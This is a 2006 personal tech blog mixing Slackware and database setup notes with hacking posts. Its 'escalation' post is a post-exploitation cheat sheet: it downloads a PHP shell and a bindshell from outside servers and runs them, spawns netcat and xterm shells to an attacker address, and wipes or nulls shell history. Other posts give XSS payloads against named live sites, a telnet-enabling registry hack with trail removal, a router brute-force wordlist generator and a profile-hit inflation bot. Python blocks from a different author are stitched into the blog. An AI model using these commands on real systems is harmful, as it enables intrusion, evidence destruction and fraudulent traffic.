Slackware is undoubtedly a great distribution (stable, simple, most Unix-like, fast, secure, etc.); my main intention in writing this tutorial is to guide novices stepping into the world of Slackware. Drop me a note if you have any comments!

Thursday, December 14, 2006

Finish your work more efficiently

With Linux's built-in tools we can do our work more efficiently. For instance, suppose we want to create 50 user directories; there are tons of ways to do the task.

a perl version:
#!/usr/bin/perl

foreach (1..50)
{
    mkdir("user$_", 0744);
    # or use the system() function instead of mkdir():
    # system("mkdir user$_");
}

We can do this with the shell too, but it only fits a case like this:
for i in {1,2,3,4,5,6,7}; do mkdir user$i; done

The Perl one-liner seems to be the best solution for this kind of task (only one line, and we can set permissions; isn't it great!)

perl -e 'for(1..6) {mkdir("user$_",0744)}'

Of course Perl is not the only option; Python, Ruby, C or whatever you like can do a good job. A lot of folks would rather spend all their time begging around for 'automated' software; hack up your brain, hack your system, the answer is always there for you.

Set up mysql 5.0.24 in slackware 11

It is a bit awkward to set MySQL up in Slackware; unlike Red Hat or other distributions that do the whole work for you, Slackware needs a couple more steps. Here is how I set it up:

$ su -
# mysql_install_db
# chown -R mysql:mysql /var/lib/mysql
# chmod +x /etc/rc.d/rc.mysqld
# /etc/rc.d/rc.mysqld start

Then, in another terminal, log in as root or as a user belonging to the appropriate group:

$ mysql
mysql>

How to install postgres 8.2 on slackware 11

It took me some time to figure out the PostgreSQL 8.2 installation on Slackware 11.
Here is how:
Grab a source copy of PostgreSQL from http://www.postgresql.org, then

./configure
gmake
su
gmake install
adduser postgres
mkdir /usr/local/pgsql/data
chown postgres /usr/local/pgsql/data
su - postgres
/usr/local/pgsql/bin/initdb -D /usr/local/pgsql/data
/usr/local/pgsql/bin/postgres -D /usr/local/pgsql/data >logfile 2>&1 &
/usr/local/pgsql/bin/createdb test
/usr/local/pgsql/bin/psql test


ripped from http://www.postgresql.org/docs/8.2/interactive/install-short.html

An easier way is to download the postgres package from http://www.linuxpackages.net and run
installpkg postgres_xx.tgz

Sometimes you get an error message like "fatal: role 'insistkool' does not exist"; do:
$ su
# createuser -U postgres
Enter name of role to add: insistkool
Shall the new role be a superuser? (y/n) y

$ initdb -D ~/data
$ postmaster -D ~/data
$ psql insistkool

Metasploit 3 needs a PostgreSQL database to perform automated exploitation, so it is highly recommended to install PostgreSQL on your machine for testing.

Friday, November 24, 2006

xss in magpierss

Found an XSS bug in MagpieRSS.

Code in magpie_debug.php & others:

if ( isset($_GET['url']) ) {
$url = $_GET['url'];
}
else {
$url = 'http://magpierss.sf.net/test.rss';
}

http://site/magpie_debug.php?url=code

A fix can be:

if (preg_match("/^(http:\/\/)?([^\/]+)/i", $url)) {   // only a plain host or http:// URL gets through
    $ext = strtolower(substr(strrchr($url, "."), 1));
    $url = Gud($url);
    switch ($ext)
    {
        case 'rss': /* do_something */ break;
        case 'other_types': /* another_thing */ break;
        default: header("Location: http://magpierss.sf.net/test.rss"); exit;
    }
}

function Gud($url) {
    // escape the value before it is echoed back into the page
    return htmlentities($url, ENT_QUOTES, 'utf-8');
}

Friday, November 17, 2006

Difference between main()/void main()/int main()/int main(void)/int main(int argc, char *argv[])

I thought this is helpful to novice

From: cprogramming.com

A very common question is "What's the difference between void main and int main?". This particular FAQ tries to answer that and more, covering other versions of the main() implementation.

The first thing to note is that this is one of those topics that people seem to like to argue over for hours, days and more. Some arguments are valid, some are not, and some are just plain old opinion.

The C and C++ standards differ when it comes to main(), so I'll detail each one separately.

For C

Under C89, main() is acceptable, although it is advisable to use the C99 standard, under which only these are acceptable:

int main ( void )
int main ( int argc, char *argv[] )

Slight variations of the above are acceptable, where int can be replaced by a typedef name defined as int, or the type of argv can be written as char ** argv, and so on.

The first option is used when you do not require access to the command line arguments.

The names argc and argv are identifiers that can be changed if you so desire, but sticking to argc/argv is convention.

The return type of main() must always be an int, this allows a return code to be passed to the invoker.

Under C89, the return statement at the end of main() is required, whereas under C99 if no return statement is present, return 0 is implied. However, it is good programming practice to always use a return statement, even if you don't have to.

For C++

The following are acceptable uses:

int main ( int argc, char *argv[] )
int main ()

The first option follows similar conventions to those used by C99.

The second option is used when you do not require access to the command line arguments, and is equivalent to the int main(void) option used by C99.

Again, the return type must always be an int, and the function should return 0; at the end, but it is not required by the standard.

(C) The difference between int main() and int main(void)

A common misconception for C programmers, is to assume that a function prototyped as follows takes no arguments:

int foo();

In fact, this function is deemed to take an unknown number of arguments. Using the keyword void within the brackets is the correct way to tell the compiler that the function takes NO arguments.

What's the deal with void main()

Under regular function calling/returning in C and C++, if you don't ever want to return anything from a function, you define its return type as void. For example, a function that takes no arguments, and returns nothing can be prototyped as:

void foo(void);

A common misconception is that the same logic can be applied to main(). Well, it can't, main() is special, you should always follow the standard and define the return type as int. There are some exceptions where void main() is allowed, but these are on specialised systems only. If you're not sure if you're using one of these specialised systems or not, then the answer is simply no, you're not. If you were, you'd know it.

Be warned that if you post your "void main" code on the forums, you're going to get told to correct it. Responding with "my teacher said it's OK" is no defence; teachers have a bad habit of being wrong. Be safe, and post only standard code, and you'll find people concentrate on answering your other problems, rather than waste time telling you about this type of thing.

But what about int main(int argc, char *argv[], char *envp[])

As an extension to the guaranteed standard, an additional parameter to main() can, on some systems, be used to gain access to the environment variables. This isn't guaranteed to work on all compilers, so use it with care if you want to keep your code portable.

And finally, this page gives some more background information as to why void main is bad.

Saturday, November 04, 2006

learning plan

While I started to learn more about buffer overflows, shellcoding and the knowledge behind them, I got really excited and depressed. Because I am learning something new (at least to me, I only knew how to compile and use it before) and feel depressed since I basically know nothing about it, esp. asm. On the other hand, my focus also shifted to forensics and therefore I pay attention to honeypots; I played around with the forensics image from polytech.edu, it is fun and easy, but felt unprofessional compared to the challenges on honeynet.org. I decided to learn more about these fields (forensics, honeypots, reverse engineering, intrusion detection, etc.) since honeynet provides detailed answers from other known professionals, which is superb! um...Now I have sooo much to learn, cool!

Wednesday, November 01, 2006

Another xss

My brother showed me this site, an interesting site that allows a customized logo, and I love this idea:
http://www.goglogo.com/s.asp?lo=inSiStKool
Very google-like and cool, rite!

But then I tried a couple of XSS on the lo param with no luck; I guess it has been filtered with a regular expression, seems secured, hum! But hey, what the heck, it works on the search box with a simple alert call.
http://www.goglogo.com/s.asp?lo=inSiStKool&q=%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E
http://www.goglogo.com/show.asp?q=a&u=%3Cscript%3Ealert(31337)%3C/script%3E
I don't see the point of filtering the 1st param and leaving the others unprotected; to accept the whole phrase for a more accurate search result, or did they just happen to forget to do so? Recall "if you spend more time on coffee, you will be hacked, and you deserved it".

Tuesday, October 31, 2006

Enable Windows Service II

A little extension of my last post

1) regedit /s
/s imports a .reg file silently.
Export the reg key on your local machine and upload it to the target host,
or
echo the .reg content in case you can't upload anything to the target (in fact, this is one of the reasons you need to modify the registry to enable services like telnet, remote desktop etc.)

2) regini
This is another great command (esp. its detailed man page - Win2003 only)
e.g.: regini.exe -m \\Server_name -b yourhack.txt

Thx h3llfyr3 for reminding me!

3) reg.exe
A command-line version of the registry editor, native on WinXP and Win2003 (Win2k Resource Kit), a very powerful tool.
Details can be found at petri.co.il

Brief examples:
reg query {\\server_name\}HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr

Drawbacks:
1) WinXP and 2003 only
2) Requires being fairly familiar with the registry structure, and you need to remember its options.
3) Lacks an option to modify a key value (maybe I just don't know it)

Other:
VBScript/JScript - default MS scripting engine
Perl, if and only if the target system has Perl (and the Win32 package) installed

Sunday, October 29, 2006

BlogSpot Profile Hiter

Somehow I came across my blog via Google and found only a couple of hits on my profile page...hum, this doesn't look good, so I spent 5 mins writing up this ugly script to auto-hit. (Oops, I must be bored!)

#!/usr/bin/perl

use LWP;
use strict;

my($usr_agent,$url,$i,$response,$num_hit);

$num_hit = <STDIN>;
$num_hit =~ /\d+/;

$usr_agent = new LWP::UserAgent;
$url="http://beta.blogger.com/profile/14114952655686676020";
$usr_agent->agent("oops");

$i=0;

while($i<$num_hit){

$usr_agent->timeout(25);
$response = $usr_agent->get($url);
++$i;
if($response->is_success){
print "Hit: $i\n";
}
}

Ha, now it has 252 hits....Google doesn't need a unique IP, or I would have to grab a bunch of proxies, which needs more work.

Tuesday, October 24, 2006

IE context menu

OK, creating an IE context menu is not new at all.

Credits to The Old New Thing (http://blogs.msdn.com/oldnewthing/archive/2004/05/24/140283.aspx)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Context_Name
@="c:\\path\\file.htm"

Then we can do funky things in the HTML page; you can use common scripting languages like JavaScript or VBScript to manipulate functions.

<script language="Javascript">
var fac = prompt("Factor", 100);
external.menuArguments.document.body.style.zoom = fac + "%";
</script>

As you see, external is the object, with menuArguments used to do the zooming. An alternative method is to make an external object, port it as a DLL file, or use your binary to output an HTML page....Your design!

The end? Not yet. From a user's point of view, there might be some annoying malware injected into his/her IE; think about how a context menu is constructed. There you go: go to the registry and delete the keys, and also keep an eye on what library it relies on (usually located at HKCR\{id}) and delete its library as well. In fact, this is how some popular anti-malware works (e.g. Spybot); if you are designing similar software, it is worthwhile to dig into the registry, the core of Windows.

p.s.: An interesting method by willij3 presents a shorter and neater hack
http://www.rpi.edu/~willij3/hacks/IEContextMenu_Reg.txt

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\&Dictionary.com]
@="javascript: open('http://www.dictionary.com/cgi-bin/dict.pl?term=' + external.menuArguments.document.selection.createRange().text,\"dictionary\");"
"Contexts"=dword:00000010

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\&Google]
@="javascript: open('http://www.google.com/search?q=' + external.menuArguments.document.selection.createRange().text,\"google\");"
"Contexts"=dword:00000010

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\&Open In New Window]
@="javascript: open(external.menuArguments.document.selection.createRange().text);"
"Contexts"=dword:00000010

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\&Search Slashdot]
@="javascript: open('http://slashdot.org/search.pl?query=' + external.menuArguments.document.selection.createRange().text,\"/.\");"
"Contexts"=dword:00000010

Sunday, October 22, 2006

Password generator II

Following my last post about the password generator, Warpboy's wordlistGenerator presents a more effective way of looping.

alphanumeric
my @var = (('A'..'Z'), (1..9));

mixalpha
my @var = (('A'..'Z'), ('a'..'z'));

upperAlpha
my @var = ('A'..'Z');

lowerAlpha
my @var = ('a'..'z');

lalpha-symbol
my @var = (('a'..'z'), (0..9), '!','@','#','$','%','^','&','*','(',')','-','_','+','=');

digit
my @var = (1..9);

all
my @char = (('A'..'Z'), (0..9), '!','@','#','$','%','^','&','*','(',')','-','_','+','=','~','`','[',']','{','}','|', "/", ":" ,";",'"',"'",'<','>',",",".","?","/");

My code:
for($i=65;$i<=122;$i++){ print ","; print "\"".chr($i)."\""; }

Then the rest of his idea is fairly simple and nice:
chomp(my $charset = <STDIN>);   # get user desired charset ... if($charset eq 'charset_name')
chomp(my $inputted = <STDIN>);  # number of words to generate
chomp(my $len = <STDIN>);       # word length (his code calls a Length() helper that is not shown)
my $ran = $#var + 1;            # counter: size of the charset

foreach (1..$inputted) {
    for (1..$len) {
        my $p = $var[int(rand($ran))];
        print pa $p;            # pa - file handle opened on the output wordlist
    }
    print pa "\n";
}

His code is available at http://www.securitydb.org/Warpboy/WordlistGenerator.rar
Cool...Perl is really a great programming language with strong flexibility and rich modules, I love it ~~



Enable Windows Service

I was pentesting a Win2003 on my VM, and telnet had been disabled. So I thought I would have to write a VBScript to enable it, but it seems too much work compared to this:

echo Windows Registry Editor Version 5.00 >open-tel.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr] >>open-tel.reg
echo "Start"=dword:00000004 >>open-tel.reg

Then execute regedit /s open-tel.reg
Remember to get rid of your trail: del open-tel.reg
So this can be extended to any other registry hack: locate the key you need to hack on your local machine, then echo it to a reg file.
Done!

The lesson is that I should be more creative and seek different ways to achieve the same goal. Hum....

Saturday, October 21, 2006

How to add your site or your favorite site to the Firefox sidebar search engine

You're a Firefox fan? You're a webmaster or web developer? Ever wanted to add a customized search engine to the Firefox (top-right) search bar? Great! Then this tip (not a new technique at all) is for you. Here are the instructions:

First you need to create a 16x16 pixel png image (as the search engine icon).
Second, make a file.src with the following structure (the # remarks are explanations, not part of the file):
<search
version=""          #version number
name=""             #engine name e.g. Google
description=""
method=""           #GET/POST
action=""           #search url, where the html form goes
searchForm=""
queryEncoding=""    #This field is optional, e.g. ISO-8859-1
queryCharset=""     #This field is optional, e.g. ISO-8859-1
>

#parameter(s)
<input name="" user>
</search>

<browser
update=""           #url to get the latest src file
updateIcon=""       #url to get the latest icon file
updateCheckDays=""  #datatype: int
>

Easy, hum! Of course, before you perform the above steps, make sure your website or your favorite site has a search engine. Finally, put this script into a page (local or remote):

function addEngine(name, ext, cat)
{
    if ((typeof window.sidebar == "object") && (typeof window.sidebar.addSearchEngine == "function"))
    {
        var url = "";   // your url: the directory that holds the .src file and the icon
        window.sidebar.addSearchEngine(
            url + name + ".src",
            url + name + "." + ext,
            name, cat);
    }
    else
    {
        document.write("oops, error");
    }
}

javascript:addEngine('title','image_format','search_category')
More info at http://mycroft.mozdev.org/deepdocs/installing.html#manual

In case you get tired of it, simply remove the src and png.
The profile folder can be found here

Thursday, October 19, 2006

password generator

I wrote a dictionary generator script for brute-forcing my router password...I know I can use C4S3y's module to make the whole work easier and make some cool script, but I just want to get my hands dirty and review a little bit of Perl scripting...
#!/usr/bin/perl

# Author: insistkool
# Date: Oct-19-2006
# Purpose: password generator - Upper and Lower Case
use strict;
use Getopt::Std;

#The for loop here is to create a alpha lists

#for(1..9){
# print ",";
# print "\"".$_."\"";
#
#}
#
#for($i=65;$i<=90;$i++){
# print ",";
# print "\"".chr($i)."\"";
#
#}
#
#for($a=97;$a<=122;$a++){
# print ",";
# print "\"".chr($a)."\"";
#
#}



my @chars =("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P",
"Q","R","S","T","U","V","W","X","Y","Z","a","b","c","d","e","f","g","h","i",
"j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","1","2",
"3","4","5","6","7","8","9");

my ($x,$y,$z,$a,$b,$c,$dict,%opts);

getopts('ho:', \%opts);   # -h takes no argument, -o takes the output file name

if(defined($opts{'o'})) {
$dict = $opts{'o'};
}
else {
$dict = "dict.txt";
}

if(defined($opts{'h'})) {
usage();
}

sub usage{
print "Usage: $0 -o dict.txt\n";
print " \t -h man page\n";
print "If output file is not specified, it will be saved to dict.txt\n";
exit 31337;
}

open(dict, ">$dict") or die "cannot open $dict: $!\n";


for($x=0;$x<@chars;$x++){
for($y=0;$y<@chars;$y++){
for($z=0;$z<@chars;$z++){
for($a=0;$a<@chars;$a++){
print dict "$chars[$x]$chars[$y]$chars[$z]$chars[$a]\n";
}
}
}
}
print "Check $dict!\n";
close(dict);
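As an added example (mine, not the blog's script), the same 4-character wordlist the Perl generator writes, produced lazily over the same 61 characters, together with the keyspace arithmetic that shows how fast a list like this exhausts a password space; the charset names are the ones from Warpboy's generator in the "Password generator II" post, and the guess rate in the main block is an assumed figure.

```python
import itertools
import string

# The 61 characters of the Perl @chars list (A-Z, a-z, 1-9; no '0', as in the original).
CHARS = string.ascii_uppercase + string.ascii_lowercase + "123456789"

# Warpboy's charset names from the "Password generator II" post, as Python strings.
CHARSETS = {
    "upperAlpha": string.ascii_uppercase,
    "lowerAlpha": string.ascii_lowercase,
    "mixalpha": string.ascii_uppercase + string.ascii_lowercase,
    "alphanumeric": string.ascii_uppercase + "123456789",
    "digit": "123456789",
}


def words(chars=CHARS, length=4):
    """Yield every word of the given length, in the same order as the four
    nested Perl loops (the first character varies slowest)."""
    for combo in itertools.product(chars, repeat=length):
        yield "".join(combo)


def first_words(n, chars=CHARS, length=4):
    """The first n entries the generator would write (a sanity check on the order)."""
    return list(itertools.islice(words(chars, length), n))


def keyspace(chars, length):
    """Number of distinct words: len(chars) ** length."""
    return len(chars) ** length


def seconds_to_exhaust(chars, length, guesses_per_second):
    """Worst-case time to try every word at the given guess rate."""
    return keyspace(chars, length) / guesses_per_second


def min_length_for(chars, guesses_per_second, target_seconds):
    """Smallest password length whose whole keyspace takes at least
    target_seconds to exhaust at guesses_per_second. Both rate and target
    are policy inputs chosen by the caller, not figures from the blog."""
    length = 1
    while seconds_to_exhaust(chars, length, guesses_per_second) < target_seconds:
        length += 1
    return length


if __name__ == "__main__":
    rate = 1000.0  # assumed guess rate, for illustration only
    print("4-char keyspace over %d chars: %d" % (len(CHARS), keyspace(CHARS, 4)))
    print("hours to exhaust at %d guesses/s: %.1f"
          % (rate, seconds_to_exhaust(CHARS, 4, rate) / 3600))
    print("first entries:", first_words(3))
```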

Wednesday, October 18, 2006

Windows Command Line

Do you know the Windows Management Instrumentation Command-line (WMIC) tool?

Nope? Then you should peer at the wmic man page by
wmic /?

Sample command usage
wmic bios > os-bios.xls
wmic process > os-process.xls
wmic os > os.xls

This comes in fairly handy, but three drawbacks I have found so far are:
1) You have to be admin (isn't MS advocating the least-privilege law?)
2) It only supports Windows XP Pro and 2003
3) Lack of output indentation

Anyway, it is a pretty cool utility; all Windows power users should spend a little bit of time learning it.

More WMIC info can be found here

Tuesday, October 17, 2006

Stupid yahoo messenger

My Yahoo Messenger had been sucking for a while, and so did the stupid Windows Media Player...a simple reinstall didn't help at all, forcing me to take the time to figure out that this whole shit was caused by both of them heavily relying on vbscript.dll and jscript.dll;
with regsvr32 jscript.dll & regsvr32 vbscript.dll I finally got them working. I can't believe Yahoo uses a Windows internal library rather than developing an independent lib...lazy Yahoo dudes!

Back Track 2.0 Beta released!

Wow...a new BackTrack version, hella new stuff has been added in, can't wait to give it a try

BackTrack Home
* Updated Kernel-Running 2.6.18-rc5, with several patches.
* Updated Tools-Old versions updated, new tools added.
* BackTrack Network Boot-Boot additional BackTrack images over PXE
* John MPI instant Cluster-Boot BackTrack cracking cluster clients over PXE
* Save2CD-Save changes to CD (assuming CD is multi-session, and a CDR).
* Japanese Input Support-Reading and writing in Hiragana / Katakana / Kanji.
* Unionfs replaced-by aufs with zlib compression.
* Kernel Sources-Included in base image.

Special Features:

* Instant Snort Setup-Sets up snort, mysql, apache, base.
* Instant Ninja (db_autopwn) - Deploys Metasploit db_autopwn on the local subnet.
* Instant Unicornscan pgsqldb Setup-Sets up Apache, Pgsql for scan info.
* Kismet auto configuration-Sets up monitor mode and kismet.conf.
* ipw3945/2200/2100 support-no injection patches.
* Prism54 / MadWifi-ng / Wlan-ng / HostAP / rt2570-With injection patches.
* Quick Installation-Using GUI installer, 100% MySlax compatible.

escalation

Interesting hack by h3llfyr3
http://www.h4cki.org/index.php?title=From_a_4Images_SQL_Injection_to_Root_Access_-_Privilage_Escalation

Also some cool hacks from their peers!
find . -perm -2 -ls

The dot being what directory to search, so I would suggest doing:

cd /home/user/public_html/;find . -perm -2 -ls

It will then give you a list of folders and files that are writable... Don't forget that there are other downloaders than wget... Doing the following command will show you what downloaders are present on the box:

which wget curl w3m lynx

For wget:

wget --directory-prefix=[DIR HERE, NO EXTENSION] [URL HERE]

For curl:

curl -o /home/user/public_html/shell.php http://www.shell.txt


cat >bindshell.c
curl -o /home/user/public_html/bindshell.c http://www.server.com/bindshell.c
gcc bindshell.c -o bindshell
./bindshell

echo open 10.0.0.1 > file.txt
echo lcd /writeable/web/dir/ >> file.txt <--this swaps your local directory to one you can write to
echo user anonymous >> file.txt
echo pass anonymous@anon.com >> file.txt
echo get bindshell.c >>file.txt
echo bye >>file.txt
to execute
ftp < file.txt


Other common tech for RSH
tftp -i attacker_ip file (nc)

nc -e /bin/sh -l -p port_number (-DGAPING_SECURITY_HOLE MUST BE compiled)

if victim host has X terminal such as xterm
xterm -display attack_ip:0.0 &

check last 20 entries in history
tail -20 /root/.bash_history

And to remove current .bash_history
rm -rf /root/.bash_history

disable command logging
ln -s /dev/null /root/.bash_history

Monday, October 16, 2006

*nix commands

Common daily-use commands (to me ^^)
#show all system info
uname -a

#check distributions
cat /etc/*issue
cat /etc/*release*

#check who is online and ip
w

#Check username and working directory
cat /etc/passwd

#Get ip
ifconfig {eth0 etc}

#You know what this is
cat /etc/shadow

#find a file
locate file.ext

#find machine on the subnet
arp -a

#compile c code
gcc in_file -o out_file

#change file permission, each x is an octal digit (0-7)
chmod xxx filename

#show running process
ps aux

#calculate MD5 sum for every file on the system (assume md5sum is on the system)
find / -type f -xdev -exec md5sum -b {} \;

#find readable files
find / -type f -perm -4 -print 2> /dev/null

#find writable files
find / -type f -perm -2 -print 2> /dev/null

#find system time and date stamps
find / -printf "%m;%Ax;%AT;%Tx;%TT;%Cx;%CT;%U;%G;%s;%p\n"

#display system variables
set

#echo current path
echo $PATH

#clean screen (windows cls)
clear

#dump kernel modules
lsmod

#check mounted file systems
mount / df

#Check patch level for RedHat 7.0
rpm -qa

#list Open Files
lsof (lsof `which file`)

#hardware info
dmesg

#usual place for logging
cat /etc/syslog.conf

#how can we miss this; this could be a couple of pages of essay, brief examples
grep str *
grep -r -i "\-a"

#check current user info
id

#figure out how long the host is up
uptime

#some system hardware info
cat /proc/meminfo
cat /proc/cpuinfo

Tuesday, October 10, 2006

HTTP Verb

From Professional Pen Testing for Web Applications:
The HTTP 1.0 specification defined three main verbs, or methods:
GET is used for requesting, or retrieving, some resource from the target web server.
POST is used to request that the target web server accept the data enclosed in the request. The acceptance is based on the fact that the processing gets handed off to the resource listed in the request (the URI).
HEAD is used exactly like GET except that the resource data body is not transferred; only metadata is sent back to the client.

The HTTP 1.1 specification added the following new HTTP verbs:
PUT is used for requesting that the target web server process the request into the resource listed (the URI).
DELETE is used to delete (on the web server) the resource from the respective request.
OPTIONS is used to request information about the communication options available with respect to the particular target web server.
TRACE is used to request a remote loopback of the request to the target web server.
CONNECT is used strictly with proxy servers that can tunnel directly with the target web server.

I didn't know PUT, DELETE, TRACE and the other verbs were added in the 1.1 specification. Cool!

Monday, October 09, 2006

Another xss

An XSS on Lycos; the point worth pointing out is not that this is a big site, but that it displays my " when http://www.homme.lycos.fr/hotbabes/categorie/"
I am wondering whether this is fuzzable, seems kinda hard coz " is valid html code...
Anyway, interesting to know XSS could also happen on a regular URL (not a parameter)

lycos.fr

Update: This XSS has already expired, but it still serves as a pretty good lesson for developers

Sunday, October 08, 2006

XSS bug

Found an interesting type of XSS on this site: construct an HTML header and do the dirty work

mass.gov

Exposed the header; this is indeed fairly funky
http://www.test.com Content-Length: 0 Cache-Control: max-age=300 Expires: Mon, 09 Oct 2006 06:15:35 GMT Connection: close Content-Type: text/plain; charset=ISO-8859-1

similar ones...

lvllord.de


Another one on
mwti.net


And discovered an XSS on a metasearch engine while I was at class
click here to see demo

even one on a government website,
http://www.xxxxx.xxx.gov.au/email/?url=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
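The two bugs on this page, the reflected XSS in the MagpieRSS `url` parameter and the header injection through a `url` redirect parameter, share one root cause: a user-supplied URL reaches HTML or a response header unchecked. The following is an added example of my own (not MagpieRSS code and not from any of the sites above) showing the server-side checks that close both; the function and class names are mine.

```python
import html
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


class BadUrl(ValueError):
    """Raised when the url parameter cannot be used safely."""


def validate_feed_url(raw: str) -> str:
    """Return raw unchanged if it is a plain http(s) URL with a host; raise BadUrl otherwise."""
    # CR, LF and other control characters end a header line or a header block,
    # which is exactly how the "construct an HTML header" trick works. Reject them
    # before parsing, because urlsplit() itself silently strips some of them.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in raw):
        raise BadUrl("control character in url parameter")
    parts = urlsplit(raw)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        # also rejects javascript:, data: and scheme-less "//host" forms
        raise BadUrl("scheme not allowed: %r" % parts.scheme)
    if not parts.hostname:
        raise BadUrl("missing host")
    return raw


def render_debug_line(raw: str) -> str:
    """The line a debug page echoes back. Escaping is unconditional: even a
    URL that passed validation may contain quotes or angle brackets."""
    return "<p>Fetching feed: %s</p>" % html.escape(raw, quote=True)


def location_header(raw: str, fallback: str) -> str:
    """Build a Location header; anything unsafe redirects to a fixed default instead."""
    try:
        target = validate_feed_url(raw)
    except BadUrl:
        target = fallback
    return "Location: " + target


if __name__ == "__main__":
    default = "http://magpierss.sf.net/test.rss"
    # constructed inputs, the second mimics a CR/LF header-injection attempt
    for sample in ["http://example.org/feed.rss",
                   "http://www.test.com\r\nContent-Length: 0",
                   "<script>alert(1)</script>"]:
        print(repr(sample), "->", location_header(sample, default))
        print("   echoed as:", render_debug_line(sample))
```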

Saturday, October 07, 2006

Server Probing

Here is a server probing script from somewhere, pretty nice...
Of course, Server Spy can do this, but the idea basically functions the same.
perl $0 > server

#!/usr/bin/perl -W
use strict;
use IO::Socket;

my @hosts = qw(www.google.com www.foundstone);

sub go {
    my $server = shift;
    print "Processing server probing ...\n";
    my $socket = IO::Socket::INET->new(PeerAddr => $server,
                                       PeerPort => '80',
                                       Proto    => 'tcp');
    unless ($socket) {
        warn "\n unable to connect to $server: $!\n";
        return;
    }
    # HTTP/1.1 requires a Host header; without it most servers answer 400,
    # though they usually still include a Server: line
    print $socket "GET / HTTP/1.1\r\nHost: $server\r\nConnection: close\r\n\r\n";
    while (<$socket>) {
        if (/^Server:\s*(.*)/) {
            print "$server: $1\n";
            last;
        }
    }
    close $socket;
}

foreach (@hosts) {
    go($_);
}
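As an added example (my own code, not the probing script above or the book excerpt on HTTP verbs), a small HTTP/1.1 request builder and header parser that does what the Perl script does (read the Server banner) and also reads the Allow header of an OPTIONS response, so the verbs listed in the "HTTP Verb" post can be checked against what a server actually advertises; the sample response is constructed, the function names are mine, and only probe() touches the network.

```python
import socket
from typing import Dict, Optional, Set

# Verbs from the HTTP 1.1 list that deserve a second look when a server advertises them.
REVIEW_METHODS = {"PUT", "DELETE", "TRACE", "CONNECT"}


def build_request(method: str, host: str, path: str = "/") -> bytes:
    """Minimal HTTP/1.1 request. Host is mandatory in 1.1 (the Perl script omits it)."""
    return (
        f"{method} {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def parse_headers(response: bytes) -> Dict[str, str]:
    """Map lower-cased header names to values from the first header block.
    The status line is kept under the key 'status-line'."""
    head, _, _body = response.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {"status-line": lines[0]}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def server_banner(response: bytes) -> Optional[str]:
    """What the Perl script prints: the Server header, if present."""
    return parse_headers(response).get("server")


def allowed_methods(response: bytes) -> Set[str]:
    """Verbs listed in the Allow header of an OPTIONS response."""
    allow = parse_headers(response).get("allow", "")
    return {m.strip().upper() for m in allow.split(",") if m.strip()}


def methods_to_review(response: bytes) -> Set[str]:
    """Advertised verbs that should be justified or disabled (TRACE, PUT, ...)."""
    return allowed_methods(response) & REVIEW_METHODS


def probe(host: str, method: str = "OPTIONS", port: int = 80, timeout: float = 5.0) -> bytes:
    """Send one request and return the raw response. Needs network access."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(method, host))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


# Constructed sample OPTIONS response (not captured from any real host).
SAMPLE_OPTIONS_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/2.2.3\r\n"
    b"Allow: GET, HEAD, POST, OPTIONS, TRACE\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    print("server :", server_banner(SAMPLE_OPTIONS_RESPONSE))
    print("allowed:", sorted(allowed_methods(SAMPLE_OPTIONS_RESPONSE)))
    print("review :", sorted(methods_to_review(SAMPLE_OPTIONS_RESPONSE)))
```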

Thursday, October 05, 2006

Google Code Search

Google's new code search engine rocks! This is gonna be super awesome for dudes like me....
http://www.google.com/codesearch
It not only supports the basic search operators, but has also added some nifty advanced search keywords, such as regexp, file:regexp, lang, package:regexp, license...

We can find common web vulnerabilities very easily (XSS, SQL injection, remote command execution, remote file inclusion...you name the rest). It would be cool if someone developed a set of signatures like the GHDB to match common web application vulnerabilities......Can I do it!

Wednesday, October 04, 2006

Shift and $_

It took me a while to figure out what the hell 'shift' and $_ do

my $suck =shift;
print $suck;

[root@rooted_Box]$ perl suck.pl 2
2

my $suck = shift || '192.168.1.1'; # show 192.168.1.1 if no arg
print $suck;

[root@rooted_Box]$ perl suck.pl
192.168.1.1

my @arr =("a","b","c");
for(@arr){print $_."\n"};

output:
a
b
c

um....Perl syntax!!

perl & php exploit template.....

Pretty neat Perl exploit template ripped from an ezine...

#!/usr/bin/perl

use strict;
use threads;
# use Some::Module;   # placeholder for whatever modules the exploit needs

use constant MAX_THREAD => 10;   # placeholder values: the template left both undefined
use constant NUM_ARGV   => 3;

my ($host, $port, $shell) = @ARGV;   # the original read @_, which is empty outside a sub

sub usage {
    print "bunch usage\n";
    exit();
}

sub exploit {
    my ($host, $port, $shell) = @_;
    # exploit body goes here
}

sub thread {
    for my $i (1..MAX_THREAD) {
        print ".";
        my $thread = threads->create(\&exploit, $host, $port, $shell);
    }
}

if (@ARGV < NUM_ARGV) { usage(); } else { exploit($host, $port, $shell); }

and another PHP exploit template from rgod (I guess)

#!/usr/bin/php -q -d short_open_tag=on
<?
error_reporting(0);                  // turn off error reporting; use E_ALL when debugging
ini_set("max_execution_time", 0);    // no execution time limit
ini_set("default_socket_timeout", 5);

function quick_dump($string)
{
  $result = ''; $exa = ''; $cont = 0;
